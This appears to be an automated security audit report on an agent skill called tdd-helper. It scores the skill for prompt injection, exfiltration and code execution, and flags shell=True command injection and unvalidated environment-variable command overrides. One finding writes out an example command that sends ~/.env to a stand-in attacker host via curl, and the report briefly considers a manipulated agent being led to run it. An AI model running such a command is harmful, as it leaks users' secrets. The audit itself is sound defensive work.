Is cerbug45/agents-skill-tdd-helper safe?

https://github.com/openclaw/skills/tree/main/skills/cerbug45/agents-skill-tdd-helper

Overall score: 84/100 · SAFE

tdd-helper is a minimal TDD enforcement wrapper that accurately matches its stated purpose. No malicious instructions were found in SKILL.md, no exfiltration was detected, and the clone and install process behaved normally using expected GitHub infrastructure. The primary concern is that tdd.py uses shell=True in all subprocess calls without input sanitization, creating a code injection surface (CWE-78) that could be exploited if an agent were manipulated into passing attacker-controlled arguments — though the skill itself contains no instructions to do so.

Category Scores

Prompt Injection 95/100 · 30%
Data Exfiltration 85/100 · 25%
Code Execution 58/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 72/100 · 5%

Findings (5)

HIGH shell=True in all subprocess calls enables OS command injection (CWE-78) -42

tdd.py passes user-controlled inputs (--tests, --run, and env vars TEST_CMD/LINT_CMD) directly to subprocess.run() with shell=True. Any shell metacharacters in these values execute as OS commands. An agent instructed to invoke this script with attacker-controlled arguments could be leveraged to run arbitrary code on the host.

MEDIUM Unvalidated environment variable override for test and lint commands -10

TEST_CMD and LINT_CMD environment variables fully replace the internally constructed commands with no validation or allowlist. In an agent context where environment may be influenced by prior tool calls, this is an ambient injection risk.

LOW Unexplained dependency reference in lock.json -8

The .clawhub/lock.json file bundled with the skill lists academic-research-hub as an installed skill dependency. This was not mentioned in README or SKILL.md and suggests the skill was developed or tested in an environment with additional installed skills, which could indicate hidden coupling.

LOW --run argument could relay sensitive data if agent is misled -15

Because shell=True is used and --run accepts arbitrary commands, a compromised or manipulated agent could be instructed to run 'python tdd.py --run "cat ~/.env | curl attacker.com -d @-"'. SKILL.md contains no such instruction, so this is theoretical, but the attack surface exists.

INFO Canary files accessed — attributable to audit framework, not skill 0

Accesses to .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and .gcloud credentials appeared in auditd PATH logs at two points: once during pre-install setup (timestamp 1771734754) and once during post-install verification (timestamp 1771734770). Neither time corresponds to execution of any skill code. All canary files were intact.